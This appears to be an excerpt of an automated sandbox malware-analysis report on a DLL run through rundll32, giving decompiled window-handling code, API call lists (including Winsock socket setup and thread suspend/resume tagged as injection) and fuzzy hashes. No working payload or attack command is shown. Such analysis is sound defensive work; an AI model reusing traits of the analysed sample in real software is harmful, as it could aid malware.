                                                                                                                          0x1002a831
                                                                                                                          0x1002a861
                                                                                                                          0x1002a865
                                                                                                                          0x1002a865
                                                                                                                          0x1002a82f
                                                                                                                          0x1002a824
                                                                                                                          0x1002a800
                                                                                                                          0x1002a800
                                                                                                                          0x1002a80a
                                                                                                                          0x1002a80e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a80e
                                                                                                                          0x00000000
                                                                                                                          0x1002a7fe
                                                                                                                          0x1002a85f
                                                                                                                          0x1002a85f
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 656273425-0
                                                                                                                          • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                          • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                          • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                          • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1001DDC0(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10014B42();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                                          0x1001aa48
                                                                                                                          0x1001aa48
                                                                                                                          0x1001aa4f
                                                                                                                          0x1001aa52
                                                                                                                          0x1001aa5a
                                                                                                                          0x1001aa5d
                                                                                                                          0x1001aa62
                                                                                                                          0x1001aa70
                                                                                                                          0x1001aa82
                                                                                                                          0x1001aa72
                                                                                                                          0x1001aa75
                                                                                                                          0x1001aa75
                                                                                                                          0x1001aa88
                                                                                                                          0x1001aa8c
                                                                                                                          0x1001aa98
                                                                                                                          0x1001aaa0
                                                                                                                          0x1001aaa2
                                                                                                                          0x1001aaa2
                                                                                                                          0x1001aaa0
                                                                                                                          0x1001aa64
                                                                                                                          0x1001aa64
                                                                                                                          0x1001aa64
                                                                                                                          0x1001aa64
                                                                                                                          0x1001aaa4
                                                                                                                          0x1001aab2
                                                                                                                          0x1001aabb
                                                                                                                          0x1001ab5b
                                                                                                                          0x1001ab62
                                                                                                                          0x1001ab69
                                                                                                                          0x1001ab73
                                                                                                                          0x1001aac1
                                                                                                                          0x1001aac3
                                                                                                                          0x1001aac8
                                                                                                                          0x1001aad3
                                                                                                                          0x1001aadc
                                                                                                                          0x1001aadc
                                                                                                                          0x1001aad3
                                                                                                                          0x1001aae0
                                                                                                                          0x1001aae7
                                                                                                                          0x1001ab28
                                                                                                                          0x1001ab37
                                                                                                                          0x1001ab44
                                                                                                                          0x1001aae9
                                                                                                                          0x1001aae9
                                                                                                                          0x1001aaf0
                                                                                                                          0x1001aaf2
                                                                                                                          0x1001aaf2
                                                                                                                          0x1001ab02
                                                                                                                          0x1001ab15
                                                                                                                          0x1001ab1f
                                                                                                                          0x1001ab1f
                                                                                                                          0x1001aae7
                                                                                                                          0x1001ab82
                                                                                                                          0x1001ab87
                                                                                                                          0x1001ab8c
                                                                                                                          0x1001ab90
                                                                                                                          0x1001ab93
                                                                                                                          0x1001ab9a
                                                                                                                          0x1001aba2
                                                                                                                          0x1001abaa
                                                                                                                          0x1001abb2
                                                                                                                          0x1001abb9
                                                                                                                          0x1001abbe
                                                                                                                          0x1001abca
                                                                                                                          0x1001abd2
                                                                                                                          0x1001abd2
                                                                                                                          0x1001abc0
                                                                                                                          0x1001abc0
                                                                                                                          0x1001abc0
                                                                                                                          0x1001abd8
                                                                                                                          0x1001abe7
                                                                                                                          0x1001abef
                                                                                                                          0x1001abef
                                                                                                                          0x1001abda
                                                                                                                          0x1001abda
                                                                                                                          0x1001abda
                                                                                                                          0x1001ac07

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                          • GetParent.USER32(?), ref: 1001AA75
                                                                                                                          • SendMessageA.USER32 ref: 1001AA98
                                                                                                                          • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                          • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                          • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                          • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                          • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 808654186-3887548279
                                                                                                                          • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                          • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                          • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                          • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 100161DE
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                          • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                          • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3191170017-0
                                                                                                                          • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                          • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                          • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                          • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                          • API String ID: 667068680-3617302793
                                                                                                                          • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                          • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                          • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                          • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                          • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                          • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                          • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                          • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                          • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                            • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                            • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                          • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                          • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                          • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                          • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1509511306-0
                                                                                                                          • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                          • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                          • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                          • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                          • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                          • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                            • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                            • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                          • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                          • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                          • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                            • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                          • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                          • String ID: AfxOldWndProc423
                                                                                                                          • API String ID: 2702501687-1060338832
                                                                                                                          • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                          • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                          • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                          • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                            • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                          • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                          • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                            • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                            • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                          • _printf.LIBCMT ref: 10012F79
                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                          • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                          • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                          • API String ID: 4222005279-2156106531
                                                                                                                          • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                          • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                          • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                          • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                          • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                          • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                          • __lock.LIBCMT ref: 10035229
                                                                                                                          • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                          • API String ID: 1036688887-2843748187
                                                                                                                          • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                          • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                          • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                          • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                          • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                          • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                          • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                          • String ID: MS Shell Dlg
                                                                                                                          • API String ID: 1736106359-76309092
                                                                                                                          • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                          • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                          • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                          • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                          • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                          • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                          • MulDiv.KERNEL32 ref: 10021F41
